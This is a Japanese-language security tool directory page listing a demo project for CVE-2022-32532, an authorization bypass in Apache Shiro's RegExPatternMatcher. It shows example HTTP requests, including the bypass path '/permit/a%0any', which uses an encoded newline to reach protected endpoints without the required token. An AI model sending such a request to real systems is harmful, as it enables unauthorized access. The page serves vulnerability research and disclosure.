Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
ツール/GitHubGitHub/lay0us/cve-2022-32532
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

リポジトリを見る
13254年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-32532

概要

これはデモプロジェクトであり、この脆弱性(CVE-2022-32532)を悪用するための条件の1つを示すものにすぎません。

実際には、もっと多くの悪用方法があります。開発者が RegExPatternMatcher を使用する限り、バイパスの脆弱性が発生する可能性があります。

紹介

現在の構成では、トークンリクエストヘッダーの検証が必要です。そうでない場合、/permit 配下のインターフェースにアクセスする権限がありません。

このリクエストは成功します

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

トークンリクエストヘッダーがない場合、アクセスは許可されません

root@kitploit:~
GET /permit/any HTTP/1.1

特別だが一般的な構成では、簡単な方法でバイパスできます

root@kitploit:~
GET /permit/a%0any HTTP/1.1

参考

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

この脆弱性はSpring-SecurityのCVE-2022-22978に似ています

感謝: bdemers(Apache Shiro PMC)および chybeta(セキュリティ研究者)

ツールをダウンロード